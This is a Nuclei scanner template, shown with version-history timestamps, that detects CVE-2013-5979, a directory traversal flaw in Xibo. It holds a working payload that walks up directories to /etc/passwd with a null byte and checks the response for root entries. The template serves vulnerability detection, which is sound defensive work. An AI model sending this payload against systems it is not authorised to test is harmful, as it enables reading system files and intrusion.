my-nuclei-templates/CVE-2013-5979.yaml

34 lines
973 B
YAML
Raw Normal View History

2021-08-19 10:29:24 +00:00
id: CVE-2013-5979
info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
2021-09-02 08:03:02 +00:00
reference:
2021-08-19 10:29:24 +00:00
- https://www.exploit-db.com/exploits/26955
2022-06-18 08:05:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
2021-08-19 10:29:24 +00:00
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
2022-06-18 08:05:25 +00:00
classification:
cve-id: CVE-2013-5979
2021-08-19 10:29:24 +00:00
tags: cve,cve2013,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-08-19 10:29:24 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/24